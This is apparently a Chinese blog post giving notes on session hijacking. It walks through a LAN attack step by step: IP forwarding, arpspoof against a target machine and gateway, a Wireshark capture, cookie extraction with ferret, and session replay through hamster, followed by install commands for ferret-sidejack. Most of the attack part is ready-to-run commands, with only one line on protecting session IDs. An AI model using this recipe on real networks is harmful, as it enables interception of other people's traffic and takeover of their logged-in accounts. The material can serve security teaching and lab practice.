• 会话劫持-ferret获取cookie


    #会话劫持(Session hijacking):

    [v1 54tian]

    这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户,因此需要保证会话标识不被泄漏。

    #原理再次说明

    #案例演示:内网会话劫持(百度,腾讯等信息)

    #相关操作命令:

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i 网卡接口(eth0) -t 目标机IP 网关IP  //欺骗目标机器

    wireshark 抓包并导出pacp格式

    ferret -r xxx.pacp(上一步生成的文件)

    将生成的hamster.txt放置/root目录

    hamster运行后设置本地浏览器代理

    #关于ferret安装:

    0.先添加源

    leafpad /etc/apt/sources.list

    https://blog.csdn.net/qq_34450601/article/details/80009095

    1.添加对32位的支持

    sudo dpkg --add-architecture i386

    2.更新

    sudo apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

    3.安装ferret

    sudo apt-get install aptitude

    sudo aptitude install ferret-sidejack:i386

    https://www.secpulse.com/archives/32859.html

    https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

    http://app.myzaker.com/news/article.php?pk=5ba076fb77ac645c1d2e49c2

  • 相关阅读:
    安卓开发_浅谈TimePicker(时间选择器)
    eclipse显示代码行数
    Java数据解析---JSON
    Java数据解析---PULL
    Java数据解析---SAX
    统计机器学习(目录)
    FP Tree算法原理总结
    梯度下降(Gradient Descent)小结
    用scikit-learn和pandas学习线性回归
    用scikit-learn学习BIRCH聚类
  • 原文地址:https://www.cnblogs.com/trevain/p/13698927.html
Copyright © 2020-2023  润新知